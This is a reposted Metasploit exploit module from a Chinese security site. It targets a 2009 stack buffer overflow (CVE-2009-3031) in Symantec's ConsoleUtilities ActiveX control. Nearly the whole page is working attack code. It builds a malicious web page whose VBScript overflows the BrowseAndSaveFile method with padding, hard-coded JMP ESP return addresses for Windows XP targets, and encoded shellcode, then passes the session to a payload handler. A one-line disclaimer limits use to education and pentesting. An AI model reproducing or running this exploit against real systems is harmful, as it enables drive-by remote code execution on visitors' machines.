首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec ConsoleUtilities ActiveX Control Buffer Overflow (msf)
来源:http://sotiriu.de/ 作者:Sotiriu 发布时间:2009-11-04  
## 
# Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

        include Msf::Exploit::Remote::HttpServer::HTML

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a stack overflow in Symantecs ConsoleUtilities.
                                        By sending an overly long string to the "BrowseAndSaveFile()" method located
                                        in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
                                        execute arbitrary code.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         => [ 'Nikolas Sotiriu (lofi)' ],
                        'Version'        => '1.0',
                        'References'     =>
                                [
                                        [ 'CVE', '2009-3031'],
                                        [ 'URL', 'http://sotiriu.de/adv/NSOADV-2009-001.txt' ],
                                        [ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00' ],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'         => 1000,
                                        'BadChars'      => "\x00",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
					[ 'Windows XP SP2 Universal',	    { 'Ret' => 0x77d92acc } ], # USER32.dll JMP ESP
					[ 'Windows XP SP2 Pro German',      { 'Ret' => 0x77D5AF0A } ], # SHELL32.dll JMP ESP
					[ 'Windows XP SP3 Pro German',      { 'Ret' => 0x7E6830D7 } ], # SHELL32.dll JMP ESP
                                ],
                        'DisclosureDate' => 'Nov 02 2009',
                        'DefaultTarget'  => 0))
        end

        def autofilter
                        false
        end

        def check_dependencies
                        use_zlib
        end

        def on_request_uri(cli, request)
                # Re-generate the payload
                return if ((p = regenerate_payload(cli)) == nil)

                # Randomize variables
                vname   = rand_text_alpha(rand(20) + 1)
                junk    = rand_text_alpha(rand(20) + 1)
                eip     = rand_text_alpha(rand(20) + 1)
                morejunk = rand_text_alpha(rand(20) + 1)
                sc      = rand_text_alpha(rand(20) + 1)
                buf = rand_text_alpha(rand(20) + 1)


                # Set RET and shellcode
                ret = Rex::Text.to_unescape([target.ret].pack('V'))
                shellcode = Rex::Text.to_unescape(p.encoded)

                # Build the Site
                content = %Q|
                        <html>
                        <object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='#{vname}'></object>
                        <script language='vbscript'>
                        arg1 = ""
                        arg3 = ""
                        arg4 = ""
                        arg5 = ""

                        #{junk}=String(310, "A")
                        #{eip}=unescape("#{ret}")
                        #{morejunk}=String(18, unescape("%u0041"))
                        #{sc}=unescape("#{shellcode}")

                        #{buf}=#{junk}+#{eip}+#{morejunk}+#{sc}
                        #{vname}.BrowseAndSaveFile arg1,#{buf},arg3,arg4,arg5
                        </script>
                        </html>
                  |

                print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

                # Transmit the response to the client
                send_response_html(cli, content)

                # Handle the payload
                handler(cli)
        end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RhinoSoft.com Serv-U 9.0.0.5 W
·Xion Audio Player version 1.0
·Joomla 1.5.12 Remote Code Exec
·PunBB Extension Attachment ver
·Linux Kernel 'pipe.c' Local Pr
·Flash应用安全规范
·Mac OS X 10.5.6/10.5.7 ptrace(
·CubeCart 4 suffers from a real
·Remote buffer overflow exploit
·Remote denial of service explo
·Blender .blend Project Arbitra
·CVE-2009-1979 PoC. Working at
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved